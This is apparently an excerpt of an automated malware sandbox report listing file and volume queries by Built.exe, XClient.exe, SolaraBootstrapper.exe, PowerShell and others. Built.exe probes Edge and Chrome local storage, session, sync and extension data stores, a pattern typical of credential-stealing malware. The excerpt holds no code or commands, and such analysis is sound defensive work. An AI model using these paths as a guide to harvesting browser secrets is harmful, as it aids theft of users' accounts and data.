Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\da VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lo VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\de VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lv VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_CA VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_GB VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\mn VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ms VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es_419 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fil VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fr_CA VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hi VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\OriginTrials VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\RecoveryImproved VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Safe Browsing VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ms VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\XClient.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Brokercrt\comReviewsession.exe	Queries volume information: C:\Brokercrt\comReviewsession.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
